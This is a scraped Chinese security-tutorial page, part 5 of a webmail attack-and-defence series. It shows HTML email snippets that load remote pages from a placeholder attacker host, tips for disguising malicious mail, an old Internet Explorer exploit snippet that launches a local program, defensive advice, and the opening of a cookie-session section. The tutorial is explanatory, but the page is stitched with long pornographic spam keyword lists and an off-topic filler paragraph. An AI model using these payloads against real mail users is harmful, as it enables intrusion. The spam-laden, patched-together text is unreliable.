在线看毛片视频-国产免费av在线-欧美日韩一区二区三区-国产成人无码av在线播放无广告-亚洲人va欧美va人人爽-国产第一草草-西班牙黄色片-四虎在线网站8848-最新av片免费网站入口-东京热无码中文字幕av专区-日本大人吃奶视频xxxx-欧美精品一区二区三区四区五区-国产片天天弄-国产免费内射又粗又爽密桃视频-欧美爱爱网站-日韩v欧美

當前位置:雨林木風(fēng)下載站 > 安全殺毒教程 > 詳細頁面

Webmail攻防實戰(zhàn)(5)

Webmail攻防實戰(zhàn)(5)

更新時間:2025-10-02 文章作者:未知 信息來源:網(wǎng)絡(luò) 閱讀次數(shù):

導(dǎo)網(wǎng)絡(luò)技術(shù)是從1990年代中期發(fā)展起來的新技術(shù),它把互聯(lián)網(wǎng)上分散的資源融為有機整體,實現(xiàn)資源的全面共享和有機協(xié)作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數(shù)據(jù)...
網(wǎng)絡(luò)技術(shù)是從1990年代中期發(fā)展起來的新技術(shù),它把互聯(lián)網(wǎng)上分散的資源融為有機整體,實現(xiàn)資源的全面共享和有機協(xié)作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數(shù)據(jù)資源、信息資源、知識資源、專家資源、大型數(shù)據(jù)庫、網(wǎng)絡(luò)、傳感器等。 當前的互聯(lián)網(wǎng)只限于信息共享,網(wǎng)絡(luò)則被認為是互聯(lián)網(wǎng)發(fā)展的第三階段。
  除了可以在html郵件中直接嵌入腳本程序外,攻擊者還可以設(shè)計一些html代碼,在用戶打開html郵件時,不知不覺引入另一個html文件,而此文件中正含有惡性代碼,這樣不僅能直接繞過WebMail系統(tǒng)對腳本程序的過濾,而且還能有效避開提供了防毒服務(wù)的郵件系統(tǒng)對惡性代碼的查殺。下面是幾個調(diào)用html文件的例子:

  (1) Refresh到另一個頁面:

<body>
<meta http-equiv="refresh" content="1;URL=http://www.attacker.com/another.htm">
</body>

  (2) Iframe引入另一個頁面:

<body>
<iframe src="http://www.attacker.com/import.htm" frameborder="0"></iframe>
</body>

  (3) scriptlet引入另一個頁面:

<body>
<object type="text/x-scriptlet" data="http://www.attacker.com/import.htm"></object>
</body>

  攻擊者還可以采取如下方法,使帶有惡性代碼的html郵件具有更大的隱蔽性:

  (1) 配合郵件欺騙技術(shù),使用戶不會懷疑收到的郵件,并且攻擊者也能隱藏自己的行蹤。

  (2) 把html郵件設(shè)計成看起來像txt郵件。

  (3) 有時可以把html郵件中的惡性代碼放在一個隱藏的層里面,表面上看不出任何變化。

  針對惡性腳本程序的影響,對用戶常見的建議辦法是提高瀏覽器的安全級別,如禁用ActiveX、禁用腳本等,但這并不是一個很好的辦法,因為這樣會影響到用戶對其他正常html頁面的瀏覽。即使瀏覽器達到了最高級別,依然對某些惡性代碼無濟于事,下面是位以色列安全專家發(fā)現(xiàn)的漏洞,能讓Windows系統(tǒng)自動執(zhí)行任何本地程序,即使Internet Explorer已經(jīng)禁止了ActiveX和腳本程序:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>

<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-
111111111111" codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>

  面對惡性html郵件,WebMail系統(tǒng)和用戶似乎都沒有很好的解決辦法,雖然許多WebMail系統(tǒng)已經(jīng)能夠過濾掉html郵件中的很多惡性代碼,不過令人遺憾的是,要想徹底過濾掉惡性代碼并不是一件容易的事情,攻擊者總能利用WebMail系統(tǒng)過濾機制和瀏覽器的漏洞找到辦法繞過種種過濾,WebMail系統(tǒng)所能做的就是發(fā)現(xiàn)一個漏洞補一個漏洞。

  為了減少乃至避免惡性html郵件的影響,在打開html郵件之前,WebMail系統(tǒng)有必要提醒用戶這是一個html郵件,如果能提供讓用戶以文本方式瀏覽html郵件的功能,則是最好不過。在打開不明郵件之前,用戶更要小心謹慎,最好把html郵件“目標另存為”到本地硬盤上再打開來看,如果能先查看html郵件源代碼,則是最好不過。

  另外需要特別提醒用戶注意的是,雖然一些電子郵件系統(tǒng)會在WebMail系統(tǒng)上對html郵件中的惡性代碼進行過濾,但在pop3服務(wù)器上并不會進行過濾,所以,如果是通過郵件客戶端收取郵件,仍然要謹防惡性html郵件的危害。

  五、Cookie會話攻擊

  當用戶以自已的郵箱帳戶和密碼登錄進WebMail以后,如果再讓用戶對每一步操作都輸入密碼加以確認就會讓人不甚其煩。所以WebMail系統(tǒng)有必要進行用戶會話跟蹤,WebMail系統(tǒng)用到的會話跟蹤技術(shù)主要有兩種:cookie會話跟蹤和URL會話跟蹤。

  Cookie是web服務(wù)器保存在用戶瀏覽器上的文本信息,可以包含用戶名、特殊ID、訪問次數(shù)等任何信息,通常此信息用于標識訪問同一web服務(wù)器上的不同用戶,在瀏覽器每次訪問同一web服務(wù)器時會發(fā)送過去,用于跟蹤特定客戶端或瀏覽器與web服務(wù)器進行交互的狀態(tài)。

  Cookie的類型有兩種:持久型和臨時型。持久型cookie以文本形式存儲在硬盤上,由瀏覽器存取。使用了持久型cookie會話跟蹤的WebMail系統(tǒng)有hotmail、yahoo電郵(可選)等。臨時型cookie也稱為會話cookie,存儲在內(nèi)存中,僅為當前瀏覽器的對話存儲,關(guān)閉當前瀏覽器后會立即消失,ASP、PHP4等開發(fā)程序中用到的session對象就會產(chǎn)生臨時型cookie。使用了臨時型cookie會話跟蹤的WebMail系統(tǒng)有FM365、億郵等。



網(wǎng)絡(luò)的神奇作用吸引著越來越多的用戶加入其中,正因如此,網(wǎng)絡(luò)的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術(shù)都需要適時應(yīng)勢,對應(yīng)發(fā)展,這正是網(wǎng)絡(luò)迅速走向進步的催化劑。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統(tǒng)下載排行

在线看毛片视频-国产免费av在线-欧美日韩一区二区三区-国产成人无码av在线播放无广告-亚洲人va欧美va人人爽-国产第一草草-西班牙黄色片-四虎在线网站8848-最新av片免费网站入口-东京热无码中文字幕av专区-日本大人吃奶视频xxxx-欧美精品一区二区三区四区五区-国产片天天弄-国产免费内射又粗又爽密桃视频-欧美爱爱网站-日韩v欧美
  • <li id="86scu"><menu id="86scu"></menu></li>
    <li id="86scu"></li>
    <button id="86scu"></button>
  • <s id="86scu"></s><button id="86scu"><menu id="86scu"></menu></button>
  • 国产精品久久久久9999爆乳| 人妻av中文系列| 国产l精品国产亚洲区久久| 一级一片免费播放| 国产亚洲视频一区| 男人添女人下面免费视频| 凹凸日日摸日日碰夜夜爽1| 免费 成 人 黄 色| 波多野结衣50连登视频| 欧美 日韩 国产一区| 久在线观看视频| 国产原创中文在线观看| www.99热这里只有精品| 久草热视频在线观看| 亚洲午夜精品久久久久久人妖| 国产精品又粗又长| 久久综合色视频| www日韩在线观看| www.久久久精品| 国产精品中文久久久久久| 亚洲美女自拍偷拍| 久久亚洲精品无码va白人极品| 九九爱精品视频| 日韩久久一级片| 国内自拍第二页| 精品一二三四五区| 北条麻妃在线观看| 国产探花在线观看视频| 免费看污污视频| 国产一区二区三区精彩视频| 在线观看免费成人av| 中国女人做爰视频| 久久久久久久久久久久久久国产| 国产超碰在线播放| 国产对白在线播放| 男女激情无遮挡| 在线观看视频黄色| 黄色免费福利视频| 超碰在线免费av| 日本成年人网址| 2022中文字幕| 视频二区在线播放| 国产九九九九九| 欧美性受xxxx黒人xyx性爽| 爱福利视频一区二区| 国产九九九视频| 亚洲精品一二三四五区| 亚洲 欧美 综合 另类 中字| 亚洲欧美手机在线| 久久久久久久久久久免费视频| 婷婷视频在线播放| 中文字幕av不卡在线| 波多野结衣家庭教师在线| 法国空姐在线观看免费| 午夜免费福利视频在线观看| 免费国产黄色网址| 免费看欧美一级片| 日韩欧美中文视频| 亚洲一级免费在线观看| 成人黄色片视频| 久久视频这里有精品| 激情六月天婷婷| 在线无限看免费粉色视频| 91精品999| 国内外成人免费在线视频| 丰满少妇在线观看| 精品免费国产一区二区| 成人三级视频在线播放| 国产精品自拍片| 91黄色小网站| 成年人在线看片| 女人另类性混交zo| 无码人妻精品一区二区三区在线| 黄色一级片播放| 大陆极品少妇内射aaaaa| 成人免费视频91| av观看免费在线| 天天爽天天爽夜夜爽| 国产原创精品在线| 亚洲热在线视频| 国产欧美精品aaaaaa片| 免费国产黄色网址| 日本熟妇人妻xxxxx| 天天爽人人爽夜夜爽| 波多野结衣国产精品| 日本黄色播放器| 国产成人在线小视频| 久久无码高潮喷水| 亚洲 激情 在线| 国产激情片在线观看| 日韩av三级在线| 国产又黄又猛的视频| 污污污污污污www网站免费| 欧美日韩不卡在线视频| 中文字幕一区二区三区四区在线视频| 免费看涩涩视频| 800av在线免费观看| 日日碰狠狠丁香久燥| 亚洲va在线va天堂va偷拍| 四虎影院一区二区| 日本三级免费观看| 精品久久免费观看| av之家在线观看| 日本黄色播放器| 国产二区视频在线播放| 麻豆中文字幕在线观看| 99精品免费在线观看| 黄色网zhan| www.亚洲高清| 亚洲不卡中文字幕无码| 色网站在线视频| 国产一级不卡毛片| 久久久久久久久久久综合| 亚洲xxxx2d动漫1| 男人添女人下部高潮视频在观看| 嫩草视频免费在线观看| 男人靠女人免费视频网站| 手机成人av在线| www.精品在线| 37pao成人国产永久免费视频| 91免费国产精品| 国内自拍第二页| 欧美国产激情视频| 97干在线视频| 黄色一级大片免费| 91pony九色| 男人的天堂最新网址| 无码aⅴ精品一区二区三区浪潮| 日本免费黄色小视频| 中文字幕免费高清在线| 日韩无套无码精品| 国产主播在线看| 日本在线观看a| 国产xxxxx在线观看| 国产二级片在线观看| 欧日韩免费视频| 9色porny| 97国产精东麻豆人妻电影| 亚洲熟妇国产熟妇肥婆| 六月婷婷在线视频| 国产精品无码一区二区在线| 国产成人a亚洲精v品无码| 久久国产午夜精品理论片最新版本| 欧美性受黑人性爽| 国产专区在线视频| 欧美精品久久久久久久免费| 黑人糟蹋人妻hd中文字幕| 中国丰满人妻videoshd| 成年人黄色片视频| 国产一伦一伦一伦| 亚洲免费av网| 波多野结衣综合网| 四虎永久在线精品无码视频| 超碰成人在线播放| 老司机午夜网站| 日日橹狠狠爱欧美超碰| 午夜免费一区二区| 国产欧美一区二| 日本人体一区二区| 黄色a级片免费| 二级片在线观看| 国产日韩一区二区在线| 在线观看免费不卡av| 亚洲啊啊啊啊啊| 成年人视频观看| 欧美一级小视频| 国产无限制自拍| 久久这里只精品| 毛片在线播放视频| 久久久久久久片| 日本大胆人体视频| 亚洲欧美激情网| 福利视频一二区| www.国产福利| av免费观看网| 美国av在线播放| jizzzz日本| 国产精品沙发午睡系列| 一级片黄色免费| 国产精品一区二区羞羞答答| 91.com在线| 免费在线精品视频| 北条麻妃视频在线| 日韩xxxx视频| 亚洲黄色网址在线观看| 性刺激的欧美三级视频| 欧美日韩黄色一级片| 日韩精品福利片午夜免费观看| 爱爱爱爱免费视频| 久草在在线视频| 人妻熟女一二三区夜夜爱| 欧美日韩激情四射| 欧美xxxxxbbbbb| 8x8x成人免费视频| 天天视频天天爽| av污在线观看| 免费一区二区三区在线观看| 亚欧在线免费观看| 黄色三级视频片| 牛夜精品久久久久久久|